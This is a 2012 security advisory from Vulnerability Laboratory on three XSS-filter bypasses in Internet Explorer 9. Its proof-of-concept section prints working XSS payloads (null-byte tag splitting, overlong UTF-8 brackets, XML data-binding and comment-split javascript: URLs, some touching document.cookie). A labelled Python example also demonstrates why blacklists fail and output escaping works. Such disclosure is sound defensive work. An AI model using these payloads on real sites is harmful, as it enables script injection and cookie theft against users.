Document Title:
===============
Internet Explorer 9.10 - XSS Protection Filter Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=729
Release Date:
=============
2012-10-19
Vulnerability Laboratory ID (VL-ID):
====================================
729
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Windows Internet Explorer 9 (IE9) is a version of the Internet Explorer web browser from Microsoft. It was released to the public on
March 14, 2011. Microsoft has released Internet Explorer 9 as a major out-of-band version that is not tied to the release schedule of
any particular version of Windows, unlike previous versions. It is the first version since Internet Explorer 2 to not be bundled with
a Windows operating system, although some OEMs have preinstalled it with Windows 7 on their PCs, as well as new Windows 7 laptops.
The system requirements for Internet Explorer 9 are Windows 7, Windows Server 2008 R2, Windows Vista Service Pack 2 or Windows Server
2008 SP2 with the Platform Update. Windows XP and earlier are not supported. Internet Explorer 9 is the last version of Internet Explorer
to be supported on Windows Vista; Internet Explorer 10 will only be supported on Windows 7 and later (up to Platform Preview 2), but
Platform Preview 3 and above work only with Windows 8. Both IA-32 and x64 builds are available.
Internet Explorer 9 supports several CSS 3 properties, embedded ICC v2 or v4 color profiles support via Windows Color System, and has
improved JavaScript performance. It is the last of the five major web browsers to implement support for Scalable Vector Graphics (SVG).
It also features hardware-accelerated graphics rendering using Direct2D, hardware-accelerated text rendering using DirectWrite,
hardware-accelerated video rendering using Media Foundation, imaging support provided by Windows Imaging Component, and high fidelity
printing powered by the XML Paper Specification (XPS) print pipeline. Internet Explorer 9 also supports the HTML5 video and audio tags
and the Web Open Font Format.
(Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Internet_Explorer_9 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple XSS Protection Filter Bypass Vulnerabilities in Microsoft Internet Explorer v9.10.
Vulnerability Disclosure Timeline:
==================================
2012-10-21: Public Disclosure
Discovery Status:
=================
Published
Affected Product(s):
====================
Microsoft Corp.
Product: Internet Explorer (Web Browser) 9.0.10 (KB2744842)
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
1.1 - Shift 1 Position to Bypass
An XSS protection filter bypass vulnerability was detected in Microsoft's official Internet Explorer v9.0.8112.16421 web browser.
The vulnerability allows a remote attacker to bypass the XSS protection mechanism of the Internet Explorer v9.x web browser to
execute client-side or server-side script code.
The second XSS protection filter bypass vulnerability is located in a "shift 1 position" misconfiguration of the filter, which leads
to a bypass. Remote attackers can insert multiple frame and onload alert strings in a GET request to shift the position of the
parser's replace step within the tag itself. The attacker can shift the position of the parsed tag by one position on refresh, because
the parsed content lies outside of the requested script code context. Remote attackers can bypass the XSS filter parse-and-replace
function of Internet Explorer 9 to perform XSS requests on the client and server side.
Successful exploitation of the web browser vulnerability results in (client- or server-side) cross-site scripting and unauthorized
script code execution via protection filter bypass.
Vulnerable Module(s):
[+] XSS & Script Code Protection Filter
Vulnerable Function(s):
[+] Shift 1 Position - Parse Function
1.2 Strings to Bypass - (Random)
An XSS protection filter bypass vulnerability was detected in Microsoft's official Internet Explorer v9.0.8112.16421 web browser.
The vulnerability allows a remote attacker to bypass the XSS protection mechanism of the Internet Explorer v9.x web browser to
execute client-side or server-side script code.
After some research around the filter function, we located several strings that bypass the XSS protection filter of the Internet
Explorer v9.x browser. The strings the filter did not recognize used the DATASRC data binding, XML tags, or JavaScript requested
via a div tag with a bound link. Remote attackers can bypass the XSS filter parse-and-replace function of Internet Explorer 9 to perform
XSS requests on the client and server side.
Successful exploitation of the web browser vulnerability results in (client- or server-side) cross-site scripting and unauthorized
script code execution via protection filter bypass.
Vulnerable Module(s):
[+] XSS & Script Code Protection Filter
Vulnerable String(s):
[+] XML
[+] DATASRC
[+] js>div<a href<js
1.3 - NullByte to Bypass
An XSS protection filter bypass vulnerability was detected in Microsoft's official Internet Explorer v9.0.8112.16421 web browser.
The vulnerability allows a remote attacker to bypass the XSS protection mechanism of the Internet Explorer v9.x web browser to
execute client-side or server-side script code.
The first XSS protection filter bypass vulnerability is located in the browser's tag-stripping function when it processes
null bytes [NULL|%00] next to blocked XSS script code and tags. Remote attackers can bypass the XSS filter parse-and-replace function
of Internet Explorer 9 to perform XSS requests on the client and server side.
Successful exploitation of the web browser vulnerability results in (client- or server-side) cross-site scripting and unauthorized
script code execution via protection filter bypass.
Vulnerable Module(s):
[+] XSS & Script Code Protection Filter
Vulnerable Function(s):
[+] stripping tags function
Note: The vulnerability has already been publicly disclosed by a friend (Jean Pascal Pereira) - http://seclists.org/bugtraq/2012/Oct/100
Proof of Concept (PoC):
=======================
1.1 - Shift 1 Position to Bypass
The remote filter bypass vulnerability can be exploited by a remote attacker; a user interaction (click) is required.
For demonstration or to reproduce ...
URL:
http://vl.com/ie9/test.php?bkm=[JAVASCRIPT]]<div<a href="><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">
String: "><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">
--- Filter Results & Check Error Log ---
/">
Warning: include() [function.include]: Failed opening '<div<a href="><iframe src=a onload=alert("VL") <http://google.de>]style="width: expression(document.cookie=true;);">' for inclusion ...
Credit: Benjamin Kunz Mejri ([email protected])
1.2 Strings to Bypass - (Random)
The remote filter bypass vulnerability can be exploited by a remote attacker; a user interaction (click) is required.
For demonstration or to reproduce ...
URL:
http://vl.com/ie9/test.php?bkm=¼script¾alert(¢XSS¢)¼/script¾
Strings: Works!
¼script¾alert(¢XSS¢)¼/script¾
--- Filter Results & Check Error Log ---
Warning: include(¼script¾alert(¢XSS¢)¼/script¾) [function.include]: failed to open stream: No such file or directory
in /home/xxx/test.php on line 8
Warning: include() [function.include]: Failed opening '¼script¾alert(¢XSS¢)¼/script¾' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8
URL:
http://vl.com/ie9/test.php?bkm=<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert(document.cookie);">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
Strings: Works!
>"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
>"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
<div<a href=http://google.de>]style="width: expression(document.cookie=true;);">
--- Filter Results & Check Error Log ---
]]>
Warning: include(<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(document.cookie);\">]]></C></X></xml><SPAN DATASRC=)
[function.include]: failed to open stream: No such file or directory in /home/xxx/test.php on line 8
Warning: include() [function.include]: Failed opening '<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert(document.cookie);\">]]>
</C></X></xml><SPAN DATASRC=' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8
]]
Warning: include(<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:document.cookie=true;\">]]</C></X></xml><SPAN DATASRC=) [function.include]:
failed to open stream: No such file or directory in /home/u145021161/public_html/chrome/secure.php on line 8
Warning: include() [function.include]: Failed opening '<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]<![CDATA[cript:document.cookie=true;\">]]</C>
</X></xml><SPAN DATASRC=' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/xxx/test.php on line 8
Credit: Benjamin Kunz Mejri ([email protected])
1.3 - NullByte to Bypass
The remote filter bypass vulnerability can be exploited by a remote attacker; a user interaction (click) is required.
For demonstration or to reproduce ...
http://localhost:1337/ieb/blah.php?a=<s%00cript>alert(1)</s%00cript>
<a href='http://localhost:1337/ieb/blah.php?a=<s[NULL]cript>alert(1)</s[NULL]cript>'>Clickme</a>
Credit: Jean Pascal Pereira ([email protected])
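The following Python script is an added example, not part of this advisory and not Microsoft's filter code. It rebuilds the three evasion shapes shown in the PoCs (NUL byte inside a tag name, overlong UTF-8 angle brackets, comment-split javascript: URL) as constructed sample strings, shows that a naive token blacklist misses all of them, that strict decoding plus NUL stripping catches only the null-byte variant, and that HTML output encoding neutralises every one. The sample payloads and function names are assumptions made for illustration.

```python
import html
import re

# Constructed sample payloads (not the advisory's literal strings) modelled
# on its three bypass classes: a NUL byte splitting a tag name (1.3),
# overlong UTF-8 encodings of '<' and '>' (1.2), and an HTML comment
# splitting a javascript: URL inside a data-bound XML island (1.2).
SAMPLES = {
    "nulbyte": b"<s\x00cript>alert(1)</s\x00cript>",
    "overlong": b"\xc0\xbcscript\xc0\xbealert(1)\xc0\xbc/script\xc0\xbe",
    "comment_split": b'<IMG SRC="javas<!-- -->cript:document.cookie=true">',
}

# A naive blacklist filter of the kind these payloads slip past: it looks
# for literal dangerous tokens in whatever bytes arrived.
BLACKLIST = re.compile(r"<script|javascript:", re.IGNORECASE)

def naive_filter_blocks(text: str) -> bool:
    """True if the blacklist would reject this text."""
    return BLACKLIST.search(text) is not None

def normalise(raw: bytes) -> str:
    """Decode strictly and drop NUL bytes before any security decision.

    Python's UTF-8 codec rejects overlong sequences such as C0 BC, so a
    non-shortest-form '<' never materialises; it becomes U+FFFD instead.
    """
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        text = raw.decode("utf-8", errors="replace")
    return text.replace("\x00", "")

def render_safely(raw: bytes) -> str:
    """Context-aware output encoding: the fix that works regardless of the
    filter, because reflected text can never become markup."""
    return html.escape(normalise(raw), quote=True)

def check_all() -> dict:
    """Per sample: blacklist on raw bytes, blacklist after normalisation,
    and whether the escaped output is free of raw '<'."""
    return {
        name: {
            "blacklist_blocked": naive_filter_blocks(raw.decode("latin-1")),
            "blocked_after_normalise": naive_filter_blocks(normalise(raw)),
            "escaped_is_inert": "<" not in render_safely(raw),
        }
        for name, raw in SAMPLES.items()
    }
```

The comment-split variant is the instructive one: no amount of normalisation makes the blacklist match it, which is why encoding at the output sink, not pattern filtering, is the defence to rely on.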
Security Risk:
==============
The security risk of the 3 XSS protection filter bypass vulnerabilities is rated as high(-).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri ([email protected])
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material, contact ([email protected] or [email protected]) to get permission.
Copyright © 2012 | Vulnerability Laboratory